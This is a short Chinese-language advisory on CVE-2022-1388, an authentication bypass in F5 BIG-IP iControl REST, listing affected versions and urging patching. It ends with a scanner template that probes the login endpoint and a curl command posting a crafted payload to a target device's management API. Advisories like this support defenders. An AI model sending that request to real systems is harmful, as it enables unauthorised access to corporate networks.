2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。该漏洞正在被积极利用。
漏洞编号:CVE-2022-1388
漏洞威胁等级:严重
漏洞评分:9.8

据F5Networks 称,财富50强公司中就有48家使用BIG-IP 网络设备/模块作为服务器负载平衡器、访问网关、应用程序交付控制器和防火墙,以管理和检查网络和应用程序流量。它们被 ISP、电信公司、大型云服务提供商和政府使用。
这个漏洞导致了攻击者获得对企业网络的初始访问权限的重大风险。请相关用户尽快安装补丁,修复该漏洞。

影响版本
BIG-IP 16.1.0 - 16.1.2
BIG-IP 15.1.0 - 15.1.5
BIG-IP 14.1.0 - 14.1.4
BIG-IP 13.1.0 - 13.1.4
BIG-IP 12.1.0 - 12.1.6
BIG-IP 11.6.1 - 11.6.5

name: F5 iControl REST API Auth Bypass
  author: numanturle
  severity: high
  reference:
    - https://127.0.0.1
  tags: rce

requests:
  - method: GET
    redirects: true
    path:
      - '{{BaseURL}}/mgmt/shared/authn/login'
    matchers:
      - type: word
        words:
          - "resterrorresponse"
          - "Authorization failed"
        condition: and

OR

curl -ks https://[F5_IP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"id"}'